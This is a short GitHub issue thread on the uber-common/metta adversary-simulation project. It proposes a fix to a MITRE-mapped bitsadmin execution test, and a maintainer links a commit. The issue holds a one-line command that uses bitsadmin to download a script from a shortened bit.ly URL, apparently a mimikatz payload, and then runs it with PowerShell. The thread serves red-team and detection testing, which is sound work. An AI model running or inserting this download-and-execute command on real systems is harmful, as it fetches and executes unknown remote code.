### ISSUE TITLE
Fix the execution_win_bitsadmin.yml

### ISSUE THREAD

**Issue by nuryslyrt** [uber-common/metta#20]
I tested the action in the metta/MITRE/Execution/execution_win_bitsadmin.yml on Win10, Win8, Win 7
You can change with this: 

```
cmd.exe /c bitsadmin.exe /transfer mimi /Download /priority high http://bit.ly/2fMPgDz C:\Tools\Default_File_Path.ps1; cmd.exe /c powershell C:\Tools\Default_File_Path.ps1
```
Because current version is just working on Win8. Not working on Win10 and Win7.

**Comment by carnal0wnage** [comment]
thanks, taking a look/testing this

**Comment by carnal0wnage** [comment]
https://github.com/uber-common/metta/commit/4a15b790701fe84a6493e52aec95e5788fef1a04
